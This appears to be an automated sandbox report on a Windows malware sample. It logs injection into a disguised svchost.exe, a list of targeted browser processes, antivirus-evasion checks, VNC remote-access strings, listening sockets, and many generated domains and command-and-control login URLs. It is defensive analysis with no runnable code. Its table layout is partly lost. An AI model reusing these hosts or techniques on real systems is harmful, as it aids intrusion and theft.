    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2DE5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F20000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F21000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F22000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F75000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2880000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2881000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2882000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 1_2_02CA78A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 5_2_02F778A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 6_2_025678A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 8_2_025D78A0
    Source: C:\Users\user\Desktop\5AFlyarMds.exe File opened: CA HIPS KmxAgent
    Source: C:\Users\user\Desktop\5AFlyarMds.exe File opened: Agnitum Outpost firewal \pipe\acsipc_server
    Source: C:\Users\user\Desktop\5AFlyarMds.exe File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
    Source: C:\Users\user\Desktop\5AFlyarMds.exe File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Window found: AVP NULL ____AVP.Root
    Source: C:\Windows\apppatch\svchost.exe File opened: CA HIPS KmxAgent
    Source: C:\Windows\apppatch\svchost.exe File opened: Agnitum Outpost firewal \pipe\acsipc_server
    Source: C:\Windows\apppatch\svchost.exe File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
    Source: C:\Windows\apppatch\svchost.exe File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
    Source: C:\Windows\apppatch\svchost.exe Window found: AVP NULL ____AVP.Root
    Source: 5AFlyarMds.exe, 5AFlyarMds.exe, 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, 5AFlyarMds.exe, 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
    Source: cUKxeliGgCix.exe, 00000005.00000000.2078408909.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, cUKxeliGgCix.exe, 00000006.00000000.2079123459.0000000000D71000.00000002.00000001.00040000.00000000.sdmp, cUKxeliGgCix.exe, 00000008.00000000.2080860743.0000000001111000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
    Source: 5AFlyarMds.exe, 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, 5AFlyarMds.exe, 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
    Source: cUKxeliGgCix.exe, 00000005.00000000.2078408909.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, cUKxeliGgCix.exe, 00000006.00000000.2079123459.0000000000D71000.00000002.00000001.00040000.00000000.sdmp, cUKxeliGgCix.exe, 00000008.00000000.2080860743.0000000001111000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
    Source: cUKxeliGgCix.exe, 00000005.00000000.2078408909.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, cUKxeliGgCix.exe, 00000006.00000000.2079123459.0000000000D71000.00000002.00000001.00040000.00000000.sdmp, cUKxeliGgCix.exe, 00000008.00000000.2080860743.0000000001111000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Code function: 0_2_00414050 cpuid 0_2_00414050
    Source: C:\Windows\apppatch\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Code function: 0_2_00402360 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle, 0_2_00402360
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Code function: 0_2_00403A20 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA, 0_2_00403A20
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CA6970 memset,GetProcessHeap,HeapAlloc,memset,GetTimeZoneInformation,Sleep,IsUserAnAdmin,GetTickCount,_snprintf,GetTempPathA,GetTempFileNameA,SetFileAttributesA,DeleteFileA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,SetFileAttributesA,DeleteFileA,Sleep,Sleep, 1_2_02CA6970
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Code function: 0_2_004034C0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle, 0_2_004034C0
    Source: 5AFlyarMds.exe Binary or memory string: S:(ML;;NRNWNX;;;LW)

    Remote Access Functionality

    Source: 5AFlyarMds.exe String found in binary or memory: RFB 003.006
    Source: 5AFlyarMds.exe, 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: RFB 003.006
    Source: 5AFlyarMds.exe, 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: $BRFB 003.006
    Source: 5AFlyarMds.exe, 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: RFB 003.006
    Source: 5AFlyarMds.exe, 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: $BRFB 003.006
    Source: svchost.exe String found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000001.00000003.2116591333.00000000039C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000003.2116591333.00000000039C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000001.00000003.1744696339.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000003.1744696339.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000001.00000002.2976326837.0000000002CF3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000002.2976326837.0000000002CF3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000001.00000002.2975747606.0000000002A06000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000002.2975747606.0000000002A06000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe String found in binary or memory: RFB 003.006
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CA9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,1_2_02CA9E40
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CC1250 htons,socket,setsockopt,closesocket,bind,listen,1_2_02CC1250
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CC0480 setsockopt,htons,socket,setsockopt,bind,1_2_02CC0480
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 5_2_02F91250 htons,socket,setsockopt,closesocket,bind,listen,5_2_02F91250
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 5_2_02F79E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,5_2_02F79E40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 5_2_02F90480 setsockopt,htons,socket,setsockopt,bind,5_2_02F90480
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 6_2_02581250 htons,socket,setsockopt,closesocket,bind,listen,6_2_02581250
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 6_2_02569E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_02569E40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 6_2_02580480 setsockopt,htons,socket,setsockopt,bind,6_2_02580480
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 8_2_025F1250 htons,socket,setsockopt,closesocket,bind,listen,8_2_025F1250
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 8_2_025D9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,8_2_025D9E40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 8_2_025F0480 setsockopt,htons,socket,setsockopt,bind,8_2_025F0480
    [MITRE ATT&CK matrix (layout not recoverable). Columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]
    [Behavior graph (image not reproduced). Behavior Graph ID: 1507126, Sample: 5AFlyarMds.exe, Startdate: 08/09/2024, Architecture: WINDOWS, Score: 100]

    Source | Detection | Scanner | Label | Link
    5AFlyarMds.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
    5AFlyarMds.exe | 100% | Joe Sandbox ML | |
    Source | Detection | Scanner | Label | Link
    C:\Windows\apppatch\svchost.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
    C:\Windows\apppatch\svchost.exe | 100% | Joe Sandbox ML | |
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                                                      unknown
                                                                      qedyqup.com
                                                                      unknown
                                                                      unknowntrue
                                                                        unknown
                                                                        qekyluv.com
                                                                        unknown
                                                                        unknowntrue
                                                                          unknown
                                                                          gatyrez.com
                                                                          unknown
                                                                          unknowntrue
                                                                            unknown
                                                                            vofybic.com
                                                                            unknown
                                                                            unknowntrue
                                                                              unknown
                                                                              pujydag.com
                                                                              unknown
                                                                              unknowntrue
                                                                                unknown
                                                                                vojykom.com
                                                                                unknown
                                                                                unknowntrue
                                                                                  unknown
                                                                                  qetysuq.com
                                                                                  unknown
                                                                                  unknowntrue
                                                                                    unknown
                                                                                    vonyzut.com
                                                                                    unknown
                                                                                    unknowntrue
                                                                                      unknown
                                                                                      pufyjuq.com
                                                                                      unknown
                                                                                      unknowntrue
                                                                                        unknown
                                                                                        pujytug.com
                                                                                        unknown
                                                                                        unknowntrue
                                                                                          unknown
                                                                                          galyhiw.com
                                                                                          unknown
                                                                                          unknowntrue
                                                                                            unknown
                                                                                            lykygun.com
                                                                                            unknown
                                                                                            unknowntrue
                                                                                              unknown
                                                                                              vopymyc.com
                                                                                              unknown
                                                                                              unknowntrue
                                                                                                unknown
                                                                                                gatyfaz.com
                                                                                                unknown
                                                                                                unknowntrue
                                                                                                  unknown
                                                                                                  vojycit.com
                                                                                                  unknown
                                                                                                  unknowntrue
                                                                                                    unknown
                                                                                                    lyvymej.com
                                                                                                    unknown
                                                                                                    unknowntrue
                                                                                                      unknown
                                                                                                      lygyvar.com
                                                                                                      unknown
                                                                                                      unknowntrue
                                                                                                        unknown
                                                                                                        purygiv.com
                                                                                                        unknown
                                                                                                        unknowntrue
                                                                                                          unknown
                                                                                                          gahykeb.com
                                                                                                          unknown
                                                                                                          unknowntrue
                                                                                                            unknown
                                                                                                            purymog.com
                                                                                                            unknown
                                                                                                            unknowntrue
                                                                                                              unknown
                                                                                                              gadyzib.com
                                                                                                              unknown
                                                                                                              unknowntrue
                                                                                                                unknown
                                                                                                                ganyqow.com
                                                                                                                unknown
                                                                                                                unknowntrue
                                                                                                                  unknown
                                                                                                                  lyxysun.com
                                                                                                                  unknown
                                                                                                                  unknowntrue
                                                                                                                    unknown
                                                                                                                    puzyjyg.com
                                                                                                                    unknown
                                                                                                                    unknowntrue
                                                                                                                      unknown
                                                                                                                      vopydek.com
                                                                                                                      unknown
                                                                                                                      unknowntrue
                                                                                                                        unknown
                                                                                                                        qexyfuq.com
                                                                                                                        unknown
                                                                                                                        unknowntrue
                                                                                                                          unknown
                                                                                                                          gatykyh.com
                                                                                                                          unknown
                                                                                                                          unknowntrue
                                                                                                                            unknown
                                                                                                                            vocykem.com
                                                                                                                            unknown
                                                                                                                            unknowntrue
                                                                                                                              unknown
                                                                                                                              gahynus.com
                                                                                                                              unknown
                                                                                                                              unknowntrue
                                                                                                                                unknown
                                                                                                                                pumypop.com
                                                                                                                                unknown
                                                                                                                                unknowntrue
                                                                                                                                  unknown
                                                                                                                                  lyvysur.com
                                                                                                                                  unknown
                                                                                                                                  unknowntrue
                                                                                                                                    unknown
                                                                                                                                    galypob.com
                                                                                                                                    unknown
                                                                                                                                    unknowntrue
                                                                                                                                      unknown
                                                                                                                                      puzypav.com
                                                                                                                                      unknown
                                                                                                                                      unknowntrue
                                                                                                                                        unknown
                                                                                                                                        gacyqoz.com
                                                                                                                                        unknown
                                                                                                                                        unknowntrue
                                                                                                                                          unknown
                                                                                                                                          lykywid.com
                                                                                                                                          unknown
                                                                                                                                          unknowntrue
                                                                                                                                            unknown
                                                                                                                                            lykytin.com
                                                                                                                                            unknown
                                                                                                                                            unknowntrue
                                                                                                                                              unknown
                                                                                                                                              vofyref.com
                                                                                                                                              unknown
                                                                                                                                              unknowntrue
                                                                                                                                                unknown
                                                                                                                                                qekytig.com
                                                                                                                                                unknown
                                                                                                                                                unknowntrue
                                                                                                                                                  unknown
                                                                                                                                                  vocyzek.com
                                                                                                                                                  unknown
                                                                                                                                                  unknowntrue
                                                                                                                                                    unknown
                                                                                                                                                    puvypoq.com
                                                                                                                                                    unknown
                                                                                                                                                    unknowntrue
                                                                                                                                                      unknown
                                                                                                                                                      puvybeg.com
                                                                                                                                                      unknown
                                                                                                                                                      unknowntrue
                                                                                                                                                        unknown
                                                                                                                                                        pupydig.com
                                                                                                                                                        unknown
                                                                                                                                                        unknowntrue
                                                                                                                                                          unknown
                                                                                                                                                          pupyguq.com
                                                                                                                                                          unknown
                                                                                                                                                          unknowntrue
                                                                                                                                                            unknown
                                                                                                                                                            qedyqal.com
                                                                                                                                                            unknown
                                                                                                                                                            unknowntrue
                                                                                                                                                              unknown
                                                                                                                                                              vowymom.com
                                                                                                                                                              unknown
                                                                                                                                                              unknowntrue
                                                                                                                                                                unknown
                                                                                                                                                                purypol.com
                                                                                                                                                                unknown
                                                                                                                                                                unknowntrue
                                                                                                                                                                  unknown
                                                                                                                                                                  ganypeb.com
                                                                                                                                                                  unknown
                                                                                                                                                                  unknowntrue
                                                                                                                                                                    unknown
                                                                                                                                                                    vopymit.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknowntrue
                                                                                                                                                                      unknown
                                                                                                                                                                      vowyguf.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknowntrue
                                                                                                                                                                        unknown
                                                                                                                                                                        pupytiq.com
                                                                                                                                                                        unknown
                                                                                                                                                                        unknowntrue
                                                                                                                                                                          unknown
                                                                                                                                                                          lymyfoj.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknowntrue
                                                                                                                                                                            unknown
                                                                                                                                                                            vowyzuf.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknowntrue
                                                                                                                                                                              unknown
                                                                                                                                                                              gatyruw.com
                                                                                                                                                                              unknown
                                                                                                                                                                              unknowntrue
Name | Malicious | Antivirus Detection | Reputation
http://lysyfyj.com/login.php | true | Avira URL Cloud: malware | unknown
http://ww16.vofycot.com/login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1 | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://gadyfys.com/Hsvchost.exe, 00000001.00000003.2590518762.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585304619.00000000073DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lysyvax.com/login.phpsvchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599492010.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qedyxel.com/login.php/svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534498249.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545030147.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://puzytul.com/login.phpsvchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2581882189.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qexyfuq.com/login.phpsvchost.exe, 00000001.00000003.2561990237.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574290902.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://gaqycow.com/login.phpsvchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590376804.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://qebyqeq.com/login.phpsvchost.exe, 00000001.00000003.2821289704.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535357779.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.000000000735E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
